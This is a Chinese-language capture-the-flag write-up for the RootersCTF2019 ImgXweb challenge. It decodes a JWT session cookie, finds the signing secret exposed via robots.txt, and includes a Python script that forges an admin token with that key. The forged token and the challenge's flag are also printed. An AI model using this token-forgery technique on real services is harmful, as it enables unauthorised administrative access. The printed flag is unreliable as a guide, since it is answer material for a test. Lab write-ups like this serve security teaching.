BUUCTF刷题记录[RootersCTF2019]ImgXweb——JWT验证问题

根据题目，进行用户注册：

登录注册账号1111，密码1111，进行抓包

        我们可以发现，session_id符合JWT模式，断定非upload上传漏洞，根据 session_id=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiMTExMSJ9.11KovmFggafMdmrs-Nre6A7kCc0SZZTw-srfpFBTMd4，我们可以将这分成三个部分，headers，payload，signature：

        headers：eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9

headers使用64base解码后为：{"typ":"JWT","alg":"HS256"}

        payload：eyJ1c2VyIjoiMTExMSJ9

payload使用64base解码后为：{"user":"1111"}

        signature：11KovmFggafMdmrs-Nre6A7kCc0SZZTw-srfpFBTMd4，第三段signature(签证)部分，看大佬的文章Python - 解析jwt - 码农教程发现应该这个现在得到的第三段，应该是作者把前两段的base密文通过.拼接起来，然后对其进行HS256加密。

        HMACSHA256(参数1+"."+参数2,参数3)，如下图：

HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  your key
) 

        再然后对hs256密文进行base64url加密，最终得到token的第三段。

        我们现在需要以admin的身份登录进去，把{"user":"1111"}改为{"user":"admin"}，但是我们还不知道第三段signature(签证)部分的参数3，就是your key，所以需要去网站目录下进行扫描，看看有没有相关信息。

        按照常规的网站目录，后面拼接robots.txt，发现secretkey路径

        拼接该路径，得到your key

        现在所有的参数都已经找齐，我们需要组成admin的session_id，运行以下py

import jwt
import datetime
from jwt import exceptions

SALT = 'you-will-never-guess'


def create_token():

 headers = {"typ":"JWT","alg":"HS256"}

 payload = {"user": "admin"}
 result = jwt.encode(payload=payload,key=SALT,algorithm='HS256',headers=headers)
 return result


if __name__ == '__main__':
 token = create_token()
print(token)

得到新的session_id：eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.g_lGU4qTO2VhNrZK9k460xz828GcqKBayZPcmLmhUqE

然后进行bp抓包，修改session_id,进行发送

我们可以看到，网页跳转至admin登录界面：

这时候需要右键，选择flag.png。复制图像地址，将图片进行下载，使用二进制打开文件，进行打开flag.png，即可得到flag：

flag{21f9295a-f31a-4cc5-9744-71243c53fbbd}